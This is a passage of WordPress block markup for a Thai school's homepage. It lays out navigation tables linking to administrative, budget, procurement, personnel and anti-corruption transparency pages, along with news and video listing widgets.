{\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs 